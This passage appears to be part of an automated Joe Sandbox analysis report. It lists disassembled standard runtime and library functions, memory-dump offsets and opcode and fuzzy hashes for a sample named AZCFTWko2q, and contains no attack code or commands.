                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                                      • Instruction ID: fe7958175614dcaeddd9998412e9dc69700130642446567cac0f93f24014a17f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A413E33A002156BFBA46FB98C44BBF3A66EFC1730F16065BF72AD66D0DB3444458A61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                                      • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
APIs
• MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024F047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024F6B51
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024F6BDA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024F6BEC
• __freea.LIBCMT ref: 024F6BF5
  • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
APIs
• SetEvent.KERNEL32(?,00000000), ref: 00423739
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
  • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
• __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
• String ID:
• API String ID: 2630251706-0
APIs
• ShowWindow.USER32(00000005), ref: 00401FAF
• UpdateWindow.USER32 ref: 00401FB7
• ShowWindow.USER32(00000000), ref: 00401FCB
• MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Window$Show$MoveUpdate
• String ID:
• API String ID: 1339878773-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 024E934A
  • Part of subcall function 024E9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024E92C6
  • Part of subcall function 024E9297: ___AdjustPointer.LIBCMT ref: 024E92E1
• _UnwindNestedFrames.LIBCMT ref: 024E935F
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024E9370
• CallCatchBlock.LIBVCRUNTIME ref: 024E9398
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
  • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
  • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
• _UnwindNestedFrames.LIBCMT ref: 004290F8
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
• CallCatchBlock.LIBVCRUNTIME ref: 00429131
Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378), ref: 024F51C8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024F2213), ref: 024F51D4
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024F51E2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction ID: 46d4cad5752d5eb509e7f9e0e7faece8045562936209ace5683fc246282be1a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B012036A022226BC7714F799C44E577B98AF86F617510731FA05D7241C720E541CAE4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024E63AF
                                                                                                                                                                                                                                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024E63C3
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024E63DB
                                                                                                                                                                                                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024E63F3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 78362717-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction ID: 81c69299a835aa918ba511e6bb5bddb62a1f90da02ee6139a2aa40fed0068101
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D601F936600614B7EF16EE59C850AEF779E9F65761F01005BEC23EB381DAB0ED11CAA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                                      • Instruction ID: 8de8eb5cdab98f28f590e1f8a502191193ae98d7daddfe58296bc3d5ac6bd466
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8118E76800204AFC715DF65C880ADBF7BAFF59320F014A5FE9568B591DBB0E904CBA0

APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
• Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

APIs
• Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
  • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
  • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
  • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
• String ID:
• API String ID: 2250070497-0
• Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
• Instruction ID: 59e08c815c588de5c0ee28ceb7b2c987c6e1d7029255c77ed5ff777828fc59c0
• Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
• Instruction Fuzzy Hash: 92011776400604ABCB24DF66C881EDAB7EAEF48320B108A1EE55A87650DBB0F9448B60

APIs
• __EH_prolog3_GS.LIBCMT ref: 024C50D1
  • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
• __Getcoll.LIBCPMT ref: 024C512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
• Instruction ID: 36e30c5a337328801767f38a337664196c51b09789e3ddebe6308d06bff41201
• Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
• Instruction Fuzzy Hash: CE018875D10309AFDB81EFA9C484B9DB7B1BF54315F60802FD059AB280CB789584CF95

APIs
• __EH_prolog3_GS.LIBCMT ref: 024C5B8D
  • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C5BD8
• __Getcoll.LIBCPMT ref: 024C5BE7
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C5BF7
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
• Instruction ID: 7f4e826561725ce430ae2d31f30f72ea0b42f73d67a3772ca3868240406ece1f
• Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
• Instruction Fuzzy Hash: BE014875910209AFDB80EFA9D484B9DB7B1BF54315F60802FD059AB280DBB89984CF95

APIs
• __EH_prolog3_GS.LIBCMT ref: 00405926
  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
• __Getcoll.LIBCPMT ref: 00405980
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
• Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
• Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
• Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

APIs
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC170
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC180
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC190
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC1A4
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Compare_exchange_acquire_4std::_
• String ID:
• API String ID: 3973403980-0
• Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction ID: fd19ad043427d46b40b90821db1211e7958cda1eb0dfa16cd4f396e399c813a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A01193A004129BBDF139E94DC918AE7B66AF25350F048517F928C4170D732D6B2EF81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024D378C
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024D2B2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024D2B4B
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024D37A8
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D37BE
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D37CC
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D28EC: SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction ID: d2598334a69d68ba9462d9f3fe4cf601aa05e88b38dbfd594def069115570f7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F027B2A002153AE720FB724C06FBB3A9C9F00741F50086BFC05E3181EAD9D4048AB5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024D1342
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024D0BD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024D0BF7
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024D1355
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024D1361
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024D136A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                                      • Instruction ID: eac07f53f57a1d05a74adbcbdcc8a4ae022a4fffd785b842303492d79dca9dd0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0B431704704A7EF147EBA087057E31979F55314F24416FE91A9F380DEB59D419A94
                                                                                                                                                                                                                                                                                      APIs
